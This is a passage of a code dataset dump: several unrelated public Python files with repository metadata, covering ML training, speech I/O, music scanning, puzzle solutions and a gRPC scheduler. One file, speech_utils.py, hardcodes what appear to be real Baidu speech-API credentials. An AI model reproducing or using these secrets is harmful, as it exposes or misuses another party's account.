dc4af11a5f90\nCreate Date: 2017-06-21 21:18:25.948689\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'd8989249f8f6'\ndown_revision = 'dc4af11a5f90'\n\nfrom alembic import op as original_op\nfrom data.migrations.progress import ProgressWrapper\n\ndef upgrade(tables, tester, progress_reporter):\n op = ProgressWrapper(original_op, progress_reporter)\n op.bulk_insert(tables.logentrykind, [\n {'name': 'change_tag_expiration'},\n ])\n\n\ndef downgrade(tables, tester, progress_reporter):\n op = ProgressWrapper(original_op, progress_reporter)\n op.execute(tables\n .logentrykind\n .delete()\n .where(tables.logentrykind.c.name == op.inline_literal('change_tag_expiration')))\n","repo_name":"angry-tony/quay","sub_path":"data/migrations/versions/d8989249f8f6_add_change_tag_expiration_log_type.py","file_name":"d8989249f8f6_add_change_tag_expiration_log_type.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3961335328","text":"salario, horasExtras, bonificacion = input().split()\nsalario = float(salario)\nhorasExtras = int(horasExtras)\nbonificacion = int(bonificacion)\n\nhoraTrabajo = salario/186\nvalorExtra = horaTrabajo*0.35\nporctBonificacion = salario*0.055*bonificacion\nsalarioTotal = salario+((valorExtra+horaTrabajo)*horasExtras)+porctBonificacion\ndescSalud = salarioTotal*0.045\ndescPension = salarioTotal*0.045\ndescCaja = salarioTotal*0.03\npagoSueldo = salarioTotal-descCaja-descPension-descSalud\n\nprint(round(salarioTotal,1),round(pagoSueldo,1))\n","repo_name":"diegomez-ang/python","sub_path":"entregaReto.py","file_name":"entregaReto.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38062615971","text":"# -*- coding: utf-8 -*-\nnumbers = input().split()\nlist1 = list()\nfor item in numbers:\n list1.append(int(item))\nlist2 = sorted(list1)\nlist3 = sorted(list1, reverse=True)\n\nif list1 == list2:\n print('C')\nelif list1 == list3:\n print('D')\nelse:\n print('N')\n","repo_name":"Cadulox/uri-online-judge","sub_path":"Ad-Hoc/2456/cartas.py","file_name":"cartas.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20189395166","text":"import supervised_classifier\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom torch.utils.data import DataLoader, Dataset\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom support.embedding_model import Embedding_Model\n\nclass MLP_Dataset(Dataset):\n def __init__(self, dataset):\n dim1 = len(dataset)\n dim2 = len(dataset[0]['X'])\n self.X = np.zeros(shape=(dim1, dim2), dtype=np.float32)\n self.Y = np.zeros(shape=(dim1, 1), dtype=np.float32)\n for idx, a in enumerate(dataset):\n self.X[idx] = a['X']\n self.Y[idx][0] = a['Y']\n\n def __len__(self):\n return len(self.X)\n\n def __getitem__(self, index):\n x = self.X[index]\n y = self.Y[index]\n return x, y\n\nclass MLP_model(nn.Module):\n def __init__(self, n_features, n_hidden_units, dropout):\n super(MLP_model, self).__init__()\n self.mlp = nn.Sequential(\n nn.Linear(n_features, n_hidden_units),\n nn.Dropout(dropout),\n nn.Linear(n_hidden_units, n_hidden_units),\n nn.Dropout(dropout),\n nn.Linear(n_hidden_units, 1),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n out = self.mlp(x)\n return out\n\n\nclass Classifier_MLP(supervised_classifier.Supervised_Classifier):\n def __init__(self,\n dataset,\n type_prediction : {'head', 'tail'},\n results_dir,\n embedding_model : Embedding_Model,\n hyper_params = None,\n model_path = None):\n if hyper_params is None:\n hyper_params = { \"n_units\" : 100, \"dropout\" : 0.2}\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n super(Classifier_MLP, self).__init__(dataset, type_prediction, results_dir,\n embedding_model, hyper_params, model_path)\n if model_path is not None:\n self.get_model().eval()\n\n def init_model(self, embedding_model, hyper_params):\n n_units = hyper_params['n_units']\n dropout = hyper_params['dropout']\n n_features = embedding_model.get_size_embedding_entity() * 2 + embedding_model.get_size_embedding_relation()\n self.set_model(MLP_model(n_features, n_units, dropout).to(self.device))\n\n def get_name(self):\n return \"MLP\"\n\n def create_training_data(self, queries_with_annotated_answers):\n out = []\n for query in tqdm(queries_with_annotated_answers):\n assert(query['query']['type'] == 1 or self.type_prediction == 'head')\n assert (query['query']['type'] == 0 or self.type_prediction == 'tail')\n ent = query['query']['ent']\n rel = query['query']['rel']\n emb_e = self.embedding_model.get_embedding_entity(ent)\n emb_r = self.embedding_model.get_embedding_relation(rel)\n for answer in query['annotated_answers']:\n a = answer['entity_id']\n emb_a = self.embedding_model.get_embedding_entity(a)\n data_entry = {}\n #X\n if self.type_prediction == 'head':\n X = np.concatenate([emb_a, emb_r, emb_e])\n else:\n X = np.concatenate([emb_e, emb_r, emb_a])\n #Y\n if answer['checked']:\n Y = 1\n else:\n Y = 0\n data_entry['X'] = X\n data_entry['Y'] = Y\n out.append(data_entry)\n return out\n\n def train(self, training_data, valid_data, model_path, batch_size=100, epochs=10):\n # Load input data\n self.get_model().train()\n training_data_set = MLP_Dataset(training_data)\n train_data_loader = DataLoader(training_data_set, batch_size=batch_size, shuffle=True)\n\n criterion = nn.BCELoss()\n optimizer = optim.Adam(self.get_model().parameters())\n for epoch in range(epochs): # loop over the dataset multiple times\n print(\"Start epoch {}\".format(epoch))\n running_loss = 0.0\n for i, data in enumerate(train_data_loader, 0):\n inputs, labels = data\n inputs.to(self.device)\n labels.to(self.device)\n optimizer.zero_grad()\n outputs = self.get_model()(inputs)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n # print statistics\n running_loss += loss.item()\n if i % 2000 == 1999: # print every 2000 mini-batches\n print('[%d, %5d] loss: %.3f' %\n (epoch + 1, i + 1, running_loss / 2000))\n running_loss = 0.0\n # TODO: Test the performance on the valid dataset\n\n # Save model\n self.save_model(model_path)\n\n def predict(self, query_with_answers, type_answers):\n ent = query_with_answers['ent']\n rel = query_with_answers['rel']\n typ = query_with_answers['type']\n assert (typ == 1 or self.type_prediction == 'head')\n assert (typ == 0 or self.type_prediction == 'tail')\n emb_e = self.embedding_model.get_embedding_entity(ent)\n emb_r = self.embedding_model.get_embedding_relation(rel)\n annotated_answers = []\n for answer in query_with_answers[type_answers]:\n # Construct the input features for the model\n emb_a = self.embedding_model.get_embedding_entity(answer)\n if self.type_prediction == 'head':\n X = np.concatenate([emb_a, emb_r, emb_e])\n else:\n X = np.concatenate([emb_e, emb_r, emb_a])\n # Do the prediction\n out = self.get_model()(torch.Tensor(X))\n score = out.item()\n checked = score > 0.5\n annotated_answers.append({'entity_id' : answer, 'checked' : checked, 'score': score})\n return annotated_answers","repo_name":"karmaresearch/duel","sub_path":"code/classifier_mlp.py","file_name":"classifier_mlp.py","file_ext":"py","file_size_in_byte":6033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19248387274","text":"# !/usr/bin/env python3\n\nimport wave\nimport pyaudio\nfrom pyaudio import PyAudio, paInt16\nfrom aip import AipSpeech\nimport io, os, subprocess, wave\nimport io\n\n\nCUID = '93489083242'\nDEV_PID = 1537\n\ndef audio_record_rt(rec_time):\n CHUNK = 1024\n FORMAT = pyaudio.paInt16 #16bit编码格式\n CHANNELS = 1 #单声道\n RATE = 16000 #16000采样频率\n p = pyaudio.PyAudio()\n # 创建音频流\n stream = p.open(format=FORMAT, # 音频流wav格式\n channels=CHANNELS, # 单声道\n rate=RATE, # 采样率16000\n input=True,\n frames_per_buffer=CHUNK)\n print(\"Start Recording...\")\n frames = [] # 录制的音频流\n # 录制音频数据\n for i in range(0, int(RATE / CHUNK * rec_time)):\n data = stream.read(CHUNK)\n frames.append(data)\n # 录制完成\n stream.stop_stream()\n stream.close()\n p.terminate()\n print(\"Recording Done...\")\n # 保存音频文件\n with io.BytesIO() as wav_file:\n wf = wave.open(wav_file, 'wb')\n wf.setnchannels(CHANNELS)\n wf.setsampwidth(p.get_sample_size(FORMAT))\n wf.setframerate(RATE)\n wf.writeframes(b''.join(frames))\n wf.close()\n wav_data = wav_file.getvalue()\n return wav_data\n\ndef shutil_which(pgm):\n \"\"\"\n python2 backport of python3's shutil.which()\n \"\"\"\n path = os.getenv('PATH')\n for p in path.split(os.path.pathsep):\n p = os.path.join(p, pgm)\n if os.path.exists(p) and os.access(p, os.X_OK):\n return p\n\ndef play_mp3(mp3_data):\n import platform, os, stat\n # determine which player executable to use\n system = platform.system()\n path = os.path.dirname(os.path.abspath(\n __file__)) # directory of the current module file, where all the FLAC bundled binaries are stored\n player = shutil_which(\"mpg123\") # check for installed version first\n if player is None: # flac utility is not installed\n if system == \"Windows\" and platform.machine() in [\"i386\", \"x86\", \"x86_64\",\n \"AMD64\"]: # Windows NT, use the bundled FLAC conversion utility\n player = os.path.join(path, \"player\", \"mpg123-win32.exe\")\n elif system == \"Linux\" and platform.machine() in [\"i386\", \"x86\", \"x86_64\", \"AMD64\"]:\n player = os.path.join(path, \"player\", \"mpg123-linux\")\n elif system == 'Darwin' and platform.machine() in [\"i386\", \"x86\", \"x86_64\", \"AMD64\"]:\n player = os.path.join(path, \"player\", \"mpg123-mac\")\n else:\n raise OSError(\n \"MP3 player utility not available - consider installing the MPG123 command line application using `brew install mpg123` or your operating system's equivalent\")\n\n try:\n stat_info = os.stat(player)\n os.chmod(player, stat_info.st_mode | stat.S_IEXEC)\n except OSError:\n pass\n\n process = subprocess.Popen(\"\\\"%s\\\" -q -\" % player, stdin=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)\n play_info, stderr = process.communicate(mp3_data)\n return play_info\n\nsp_client = AipSpeech('14922410', 'NSChZHWWVwa1BSwZ36Oaya4C', '1dd0sxs2LXYRWETZ4gZSSDYDQvM6aROv')","repo_name":"konghaoshen/CustomerServiceAI","sub_path":"asr/speech_utils.py","file_name":"speech_utils.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33413647521","text":"import urllib, re\nfrom xml.dom import minidom\nimport Media, AudioFiles\n\nVirtual = True\n\ndef Scan(path, files, mediaList, subdirs, language=None):\n if len(path) == 0:\n # Top level, albums.\n dom = minidom.parse(urllib.urlopen('http://127.0.0.1:32400/music/iTunes/Albums'))\n for album in sorted(dom.getElementsByTagName('Album'), key=lambda album: album.getAttribute('artist').lower() + album.getAttribute('album').lower()):\n subdirs.append('/' + album.getAttribute('key'))\n else:\n # Tracks.\n paths = path.split('/')\n dom = minidom.parse(urllib.urlopen('http://127.0.0.1:32400/music/iTunes/Albums/%s' % paths[0]))\n artist_album_map = {}\n compilation_count = 0\n for track in dom.getElementsByTagName('Track'):\n # Figure out album artist.\n album_artist = track.getAttribute('albumArtist').strip()\n artist_album_map[album_artist] = True\n if len(album_artist) == 0: album_artist = None\n else: album_artist = album_artist.encode('utf-8')\n \n # Track index, do a bit of extra work.\n index = int(track.getAttribute('index'))\n file = track.getAttribute('file').split('/')[-1]\n if index == 0:\n try: index = int(re.findall('[.\\-]+[ ]*([0-9]{2})[ ]*[.\\-]', file)[0])\n except: \n try: index = int(re.findall('^([0-9]{2})[ .\\-]', file)[0])\n except: pass\n \n # Add the track.\n t = Media.Track(artist = track.getAttribute('artist').encode('utf-8'),\n album = track.getAttribute('album').encode('utf-8'),\n title = track.getAttribute('track').encode('utf-8'),\n index = index,\n album_artist = album_artist,\n disc = int(track.getAttribute('disc')))\n if track.getAttribute('compilation') == '1': compilation_count = compilation_count + 1\n t.parts.append(urllib.unquote(track.getAttribute('file')).encode('utf-8'))\n mediaList.append(t)\n \n # If we're listed as a compilation, make sure all album artists are there and the same.\n if compilation_count > 0 and (len(artist_album_map) > 1 or len(artist_album_map.keys()[0]) == 0):\n for t in mediaList:\n t.album_artist = 'Various Artists'\n","repo_name":"jbartfield/Scanners.bundle","sub_path":"Contents/Resources/Music/Plex iTunes Scanner.py","file_name":"Plex iTunes Scanner.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35211127106","text":"import torch\nimport math\nimport matplotlib.pyplot as plt\n\ndef mod_sigmoid(x):\n return 2 * torch.sigmoid(x)**(math.log(10)) + 1e-7\n\ndef safe_log(x, eps=1e-7):\n return torch.log(x + eps)\n\n###################\n# Noise Filtering - Follows same as DDSP repo\n# https://github.com/magenta/ddsp/blob/main/ddsp/synths.py#L181\n# Takes fourier domain filter coefficients and a filter window and returns filtered uniform noise\n# - Calculate parameters, N, num_samples\n# - Invert filter coefficients from fourier domain -> time domain\n# - Applywindowing by multiplying time domain filter coefficients by filter (FFT, Hann etc) window\n# - Apply FFT shift on filter coefficient in time domain\n# - Create noise signal from uniform noise\n# - Transform noise signal and windowed filter coefficients into fourier domain\n# - Convolve the signal, by multiplying them in the fourier domain\n# - Perform inverse fourier transform of new signal to get audio signal\ndef noise_filtering(filter_coeffs,filter_window):\n N = filter_coeffs.shape[0]\n # get number of sample based on number of freq bins\n num_samples = (filter_coeffs.shape[1]-1)*2\n dtype = filter_coeffs.dtype\n # create impulse response\n # torch.complex is not implemented on MPS, use CPU\n filter_coeffs = torch.complex(filter_coeffs,torch.zeros_like(filter_coeffs))\n # Inverting filter coefficients from fourier domain --> tmie domain for windowing\n filter_ir = torch.fft.irfft(filter_coeffs)\n # Apply windowing\n filter_ir = filter_ir*filter_window.unsqueeze(0).repeat(N,1)\n # ir = filter_ir[0].detach().cpu().numpy()\n # plt.plot(ir)\n # plt.savefig(\"windowed_impulse_response.png\")\n\n # Apply fft shift \n # Question - Why are we doing this and what is it doing, can see that it is done in DDSP\n \n filter_ir = torch.fft.fftshift(filter_ir,dim=-1)\n # convolve with noise signal\n # Create noise, why doe we multiply by 2 and subtract 1 here\n noise = torch.rand(N, num_samples, dtype=dtype, device=filter_coeffs.device)*2-1\n # Transform noise and impulse response filters into fourier domain\n S_noise = torch.fft.rfft(noise,dim=1)\n S_filter = torch.fft.rfft(filter_ir,dim=1)\n # Conv (multiply in fourier domain)\n S = torch.mul(S_noise,S_filter)\n # Invert back into time domain to get audio\n audio = torch.fft.irfft(S)\n\n # Note that overlapp and add is used here in DDSP, \n # but this is because they are usung a bunch of audio frames\n # do they doe something similar in Neural Gran Synth\n\n return audio","repo_name":"aaron-dees/neuralGranularSynthesis","sub_path":"utils/dsp_components.py","file_name":"dsp_components.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22556006058","text":"import logging\nimport random\nfrom random import sample\nfrom typing import List, Dict, NoReturn\nimport os, sys\nimport numpy as np\nimport pandas as pd\nimport json\nfrom torch.utils import data\nimport torch\nfrom torch.utils.data import BatchSampler, SubsetRandomSampler\nfrom tqdm import tqdm\n\nfrom .util_classes import RenovationError\nfrom .data_utils import command_line\n\nTQDM_MODE = True\n\n\nclass AgentBase:\n def __init__(\n self, train_set, batch_size, selector_class, model, device, budget\n ):\n self.batch_size = batch_size\n self.train_set = train_set\n self.selector = selector_class\n self.selector.assign_agent(self)\n self.model = model\n self.device = device\n\n self.budget = budget\n self.initial_budget = self.budget\n\n self.unlabelled_set = None\n self.labelled_set = None\n self.num = 0\n self.round_all_word_scores = {}\n\n def init(self, init_cost_prop, seed=42):\n print(\"starting random init\")\n self.random_init(init_cost_prop, seed)\n self.update_datasets()\n print(\"finished random init\")\n\n def step(self, update_dataset=True):\n print('step')\n if update_dataset:\n self.update_dataset_attributes()\n self.update_index()\n self.update_datasets()\n\n def budget_spent(self):\n return self.initial_budget - self.budget\n\n def num_instances(self):\n return sum([len(l) for l in self.labelled_set])\n\n def save(self, save_path):\n self.train_set.index.save(save_path)\n self.selector.save(save_path)\n with open(os.path.join(save_path, \"all_word_scores_no_nan.json\"), \"w\") as f:\n json.dump(self.round_all_word_scores, f)\n raise RenovationError('This is original project specific')\n\n def random_init(self, init_cost_prop, seed):\n \"\"\"\n Randomly initialise self.labelled_idx dictionary\n \"\"\"\n\n # Randomly order the datapoints in the dataset using a seed\n init_sampler = random.Random(seed)\n randomly_ordered_indices = sorted(range(len(self.train_set)), key=lambda k: init_sampler.random())\n\n # Use dataset property:\n init_cost = self.train_set.total_cost * init_cost_prop\n\n # Go through random order, stop when cost hit\n budget_spent = 0\n for i in randomly_ordered_indices:\n self.train_set.index.label_instance(i)\n budget_spent += self.train_set.get_cost_by_index(i)\n if budget_spent > init_cost:\n break\n\n # 'Global' cost budget variable\n self.budget -= budget_spent\n\n print(f\"total dataset cost: {self.train_set.total_cost}\")\n print(f\"initialised with {budget_spent} cost | remaining cost budget: {self.budget}\")\n\n def __iter__(self):\n return self\n\n def __next__(self):\n num = self.num\n self.num += 1\n if num < 0:\n raise StopIteration\n if num > 0:\n self.step()\n if self.budget <= 0:\n self.num = -1\n return self.budget\n\n def update_datasets(self):\n unlabelled_instances = set()\n labelled_instances = set()\n\n print(\"update datasets\")\n for i in tqdm(range(len(self.train_set)), disable=not TQDM_MODE):\n if self.train_set.index.is_partially_unlabelled(i):\n unlabelled_instances.add(i)\n if self.train_set.index.has_any_labels(i):\n labelled_instances.add(i)\n\n self.unlabelled_set = list(\n BatchSampler(\n SubsetRandomSampler(list(unlabelled_instances)),\n self.batch_size,\n drop_last=False,\n )\n )\n\n self.labelled_set = list(\n BatchSampler(\n SubsetRandomSampler(list(labelled_instances)),\n self.batch_size,\n drop_last=False,\n )\n )\n\n def update_dataset_attributes(self):\n \"\"\"\n Score unlabelled instances in terms of their suitability to be labelled next.\n Add the highest scoring instance indices in the dataset to self.labelled_idx\n \"\"\"\n\n if self.budget <= 0:\n logging.warning(\"no more budget left!\")\n\n with torch.no_grad():\n # print('get sentence scores')\n for batch_indices in tqdm(\n self.unlabelled_set + self.labelled_set, disable=not TQDM_MODE\n ):\n instances, _, lengths, _ = self.train_set.get_batch(batch_indices, labels_important=False)\n try:\n model_attrs = self.model(instances.to(self.device))\n except:\n model_attrs = self.model(instances)\n model_attrs = {k: v.detach() if isinstance(v, torch.Tensor) else v for k, v in model_attrs.items()}\n self.train_set.update_attributes(batch_indices, model_attrs, lengths)\n\n def update_index(self):\n\n all_windows = []\n for labelled_batch_indices in tqdm(self.labelled_set, disable=not TQDM_MODE):\n windows = self.selector.window_generation(labelled_batch_indices, self.train_set)\n all_windows.extend(windows)\n for unlabelled_batch_indices in tqdm(self.unlabelled_set, disable=not TQDM_MODE):\n windows = self.selector.window_generation(unlabelled_batch_indices, self.train_set)\n all_windows.extend(windows)\n\n all_windows.sort(key=lambda e: e.score, reverse=True)\n best_windows, budget_spent = self.selector.select_best(all_windows)\n self.budget -= budget_spent\n if self.budget < 0:\n logging.warning(\"no more budget left!\")\n\n total_cost = 0\n for window in best_windows:\n total_cost += window.cost\n self.train_set.index.label_window(window)\n\n # No more windows of this size left\n if total_cost < self.selector.round_cost:\n self.selector.reduce_window_size()\n\n\nclass ActiveLearningAgent(AgentBase):\n def __init__(self, train_set, batch_size, selector_class, model, device, budget):\n # ADD AN EXCEPTION FOR THE WRONG TYPE OF SELECTOR HERE\n super(ActiveLearningAgent, self).__init__(train_set, batch_size, selector_class, model, device, budget)\n\n\nclass SubsetSelectionAgent(AgentBase):\n def __init__(self, train_set, batch_size, selector_class, model, device, budget):\n super(SubsetSelectionAgent, self).__init__(train_set, batch_size, selector_class, model, device, budget)\n\n\nclass KaldiAgent(AgentBase):\n def __init__(self, train_set, batch_size, selector_class, model, device, namer, budget, suffix, call_path=True):\n super(KaldiAgent, self).__init__(train_set, batch_size, selector_class, model, device, budget)\n if call_path:\n command_line('bash path.sh')\n self.namer = namer\n self.suffix = suffix\n\n def init(self, init_parts_path):\n print(f'Initialising agent from {init_parts_path}')\n with open(init_parts_path, \"r\") as f:\n lines = f.read()[:-1].split('\\n')\n lines = [l.rstrip() for l in lines]\n previously_selected_indices = []\n\n # TEMPORARY FIX - THIS CAN BE MADE QUICKER UNDER A PERMANENT BY PARTS ASSUMPTION\n utt_ids = {}\n [utt_ids.update({u: (j, k) for k, u in enumerate(self.train_set.utt_ids[j])}) for j in range(len(self.train_set))]\n utt_idxs = []\n for line in lines:\n idxs = utt_ids.get(line)\n if idxs:\n a, b = idxs\n previously_selected_indices.append(a)\n utt_idxs.append(b)\n budget_previously_spent = 0\n for i, j in enumerate(previously_selected_indices):\n self.train_set.index.label_instance(j)\n # Fix this when things are resolved\n budget_previously_spent += self.train_set.cost[j][utt_idxs[i]]\n\n # self.budget -= budget_previously_spent\n print(f'Finished initialising agent with {budget_previously_spent} data, NOT included in {self.budget} budget')\n\n self.update_datasets(write_to_file = False)\n\n def step(self, update_dataset=True):\n self.namer.update_paths(self.suffix)\n return super().step(update_dataset=update_dataset)\n\n def random_init(self, num_instances, seed):\n raise NotImplementedError(\"Random init not implemented for KaldiAgent, init requires a utterance list file\")\n\n def update_datasets(self, write_to_file = True):\n\n unlabelled_instances = set()\n labelled_instances = set()\n\n print(\"update datasets\")\n for i in tqdm(range(len(self.train_set)), disable=not TQDM_MODE):\n if self.train_set.index.is_partially_unlabelled(i):\n unlabelled_instances.add(i)\n if self.train_set.index.has_any_labels(i):\n labelled_instances.add(i)\n\n self.unlabelled_set = list(\n BatchSampler(\n SubsetRandomSampler(list(unlabelled_instances)),\n self.batch_size,\n drop_last=False,\n )\n )\n\n self.labelled_set = list(\n BatchSampler(\n SubsetRandomSampler(list(labelled_instances)),\n self.batch_size,\n drop_last=False,\n )\n )\n\n if write_to_file:\n\n with open(self.namer.current_paths['labelled_utts'], 'w') as f:\n # is sorting an issue? Kaldi might have a case for this\n # MAKE SURE THIS DOES AFFECT LABELLED_SET\n for group_index in labelled_instances:\n group = self.train_set.utt_ids[group_index]\n labelled_utt_ids = [g for i, g in enumerate(group) if i in self.train_set.index.labelled_idx[group_index]]\n for utt_id in labelled_utt_ids:\n f.write(utt_id)\n f.write('\\n')\n\n with open(self.namer.current_paths['unlabelled_utts'], 'w') as f:\n # is sorting an issue? Kaldi might have a case for this\n for group_index in unlabelled_instances:\n group = self.train_set.utt_ids[group_index]\n unlabelled_utt_ids = [g for i, g in enumerate(group) if i in self.train_set.index.unlabelled_idx[group_index]]\n for utt_id in unlabelled_utt_ids:\n f.write(utt_id)\n f.write('\\n')\n\n clustersize = 30\n\n for feature_name in self.namer.feature_names:\n break\n self.prepare_feat_subset(feature_name)\n combined_feature_name = self.combine_feat_subset(feature_name)\n self.compute_cmvn(combined_feature_name)\n self.split_data_dir(combined_feature_name, clustersize)\n self.split_data_dir(feature_name, clustersize)\n\n\nclass AutomaticKaldiNameIncrementer:\n\n def __init__(self, model_run_dir:str, data_run_dir:str, log_run_dir:str, base_model_paths:dict, base_data_paths:dict, base_log_paths:dict, constant_paths:dict, feature_names:list, make=True):\n self.model_run_dir, self.data_run_dir, self.log_run_dir = model_run_dir, data_run_dir, log_run_dir\n self.previous_paths = {}\n self.previous_paths.update({k: os.path.join(model_run_dir, v.split('/')[-1]) for k, v in base_model_paths.items()})\n self.previous_paths.update({k: os.path.join(data_run_dir, v.split('/')[-1]) for k, v in base_data_paths.items()})\n self.previous_paths.update({k: os.path.join(data_run_dir, v.split('/')[-1]) for k, v in base_log_paths.items()})\n\n if make:\n\n for dir in [data_run_dir, model_run_dir, log_run_dir]:\n try:\n os.mkdir(dir)\n except FileExistsError:\n non_symb = [f for f in os.listdir(dir) if not os.path.islink(os.path.join(dir, f))]\n if len(non_symb) == 0:\n print(f\"{dir} exists but only has symbolic links, ignoring error\")\n else:\n raise FileExistsError()\n\n for file_path in base_model_paths.values():\n sym_path = os.path.join(model_run_dir, file_path.split('/')[-1])\n try:\n os.symlink(file_path, sym_path)\n except FileExistsError:\n assert os.readlink(sym_path) == file_path\n\n for file_path in base_data_paths.values():\n sym_path = os.path.join(data_run_dir, file_path.split('/')[-1])\n try:\n os.symlink(file_path, sym_path)\n except FileExistsError:\n assert os.readlink(sym_path) == file_path\n\n for file_path in base_log_paths.values():\n sym_path = os.path.join(log_run_dir, file_path.split('/')[-1])\n try:\n os.symlink(file_path, sym_path)\n except FileExistsError:\n assert os.readlink(sym_path) == file_path\n\n self.current_paths = self.previous_paths.copy()\n self.constant_paths = constant_paths\n self.feature_names = feature_names\n\n def update_paths(self, suffix):\n self.previous_paths = self.current_paths\n self.current_paths = {k: v+suffix for k, v in self.previous_paths.items()}\n","repo_name":"puria-radmard/iib_project","sub_path":"active_learning/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":13376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16381936732","text":"#!/bin/python3\n\nfrom ast import literal_eval\n\n\ndef compareLists(a, b):\n # print(\"Comparing \" + str(a) + \" vs \" + str(b))\n useLen = max(len(a), len(b))\n\n for i in range(useLen):\n if i >= len(a):\n return True\n if i >= len(b):\n return False\n\n if isinstance(a[i], int) and isinstance(b[i], int):\n if a[i] > b[i]:\n return False\n if a[i] < b[i]:\n return True\n elif isinstance(a[i], list) and isinstance(b[i], list):\n retval = compareLists(a[i], b[i])\n if retval is not None:\n return retval\n elif isinstance(a[i], int) and isinstance(b[i], list):\n tmpVal = a[i]\n a[i] = []\n a[i].append(tmpVal)\n retval = compareLists(a[i], b[i])\n if retval is not None:\n return retval\n elif isinstance(a[i], list) and isinstance(b[i], int):\n tmpVal = b[i]\n b[i] = []\n b[i].append(tmpVal)\n retval = compareLists(a[i], b[i])\n if retval is not None:\n return retval\n\n\nfile = open(\"input\", \"r\")\ninput = file.readlines()\nfile.close()\n\npairs = []\ncorrectCounter = 0\n\nfor line in input:\n if line != \"\\n\":\n pairs.append(literal_eval(line.strip()))\n\ntmpCounter = 1\nlocPairs = pairs.copy()\nfor i in range(0, len(pairs), 2):\n compareResult = compareLists(locPairs[i], locPairs[i+1])\n # print(str(tmpCounter) + \": \" + str(compareResult))\n if(compareResult):\n correctCounter += tmpCounter\n tmpCounter += 1\n\nprint(correctCounter)\n\n\n# Part 2\ndef bubbleSort(pairs):\n for i in range(len(pairs)-1):\n for j in range(0, len(pairs)-i-1):\n if compareLists(pairs[j+1], pairs[j]):\n pairs[j], pairs[j+1] = pairs[j+1], pairs[j]\n\n\nstrList = []\nresolution = [-1, -1]\npairs += [[2]]\npairs += [[6]]\nbubbleSort(pairs)\n\nfor (i, line) in enumerate(pairs):\n print(line)\n if line == [[[[2]]]]:\n resolution[0] = i+1\n elif line == [[[[6]]]]:\n resolution[1] = i+1\n\nprint(resolution[0] * resolution[1])\n","repo_name":"benjamin-zastrow/AdventOfCode2022","sub_path":"13/packets.py","file_name":"packets.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33905029818","text":"import pytest\n\nfrom weppy.testing.env import EnvironBuilder\nfrom weppy.sessions import SessionManager\n\n\n@pytest.fixture(scope='module')\ndef current():\n from weppy.globals import current\n builder = EnvironBuilder()\n current.initialize(builder.get_environ())\n return current\n\n\ndef test_session_cookie(current):\n session_cookie = SessionManager.cookies(\n key='sid',\n secure=True,\n domain='localhost',\n cookie_name='foo_session'\n )\n assert session_cookie.key == 'sid'\n assert session_cookie.secure is True\n assert session_cookie.domain == 'localhost'\n\n session_cookie.open()\n assert current.session._expiration == 3600\n\n session_cookie.close()\n cookie = str(current.response.cookies)\n assert 'foo_session' in cookie\n assert 'Domain=localhost;' in cookie\n assert 'secure' in cookie.lower()\n\n current.request.cookies = current.response.cookies\n session_cookie.open()\n assert current.session._expiration == 3600\n","repo_name":"feitianyiren/weppy","sub_path":"tests/test_session.py","file_name":"test_session.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"42726788043","text":"import os\nimport random\nimport threading\nimport logging\nfrom pathlib import Path\nfrom concurrent.futures import ThreadPoolExecutor\nimport grpc\nfrom grpc import StatusCode\n\nfrom scheduler import ledger\nfrom scheduler.event import Event\nfrom scheduler.auth import Auth, AuthException\nfrom scheduler.utils import unix_time, uuid, open_db\n\nfrom capsule import common_pb2 as co\n\nfrom capsule import scheduler_pb2 as sc\nfrom capsule.scheduler_pb2_grpc import (\n SchedulerServicer,\n add_SchedulerServicer_to_server,\n)\n\nfrom capsule import worker_pb2 as wo\nfrom capsule.worker_pb2_grpc import WorkerStub\n\n\ndef requires_token(f):\n \"\"\"Decorator that checks token in request metadata and puts an openid in context.\"\"\"\n\n def _get_metadata(context):\n return dict(context.invocation_metadata())\n\n def inner(self, request, context):\n metadata = _get_metadata(context)\n if \"token\" not in metadata:\n context.abort(StatusCode.UNAUTHORIZED, \"Auth token needed\")\n token = metadata[\"token\"]\n try:\n context.openid = self.auth.get_openid(token)\n except AuthException:\n context.abort(StatusCode.UNAUTHORIZED, \"Bad token\")\n return f(self, request, context)\n\n return inner\n\n\ndef log_request(f):\n def inner(self, request, context):\n logging.info(f'{f.__name__}\\n{request}')\n return f(self, request, context)\n\n return inner\n\n\nclass MyScheduler(SchedulerServicer):\n def __init__(self, auth, task_event, db_fn):\n self.auth = auth\n self.task_event = task_event\n self.db_fn = db_fn\n self.workers = set()\n\n def worker_stub(self):\n if not self.workers:\n raise Exception('No worker available')\n endpoint = random.choice(list(self.workers))\n return WorkerStub(grpc.insecure_channel(endpoint))\n\n @log_request\n def TryLogin(self, request, context):\n token = request.token\n\n try:\n if self.auth.request_login(token):\n return co.Empty()\n else:\n 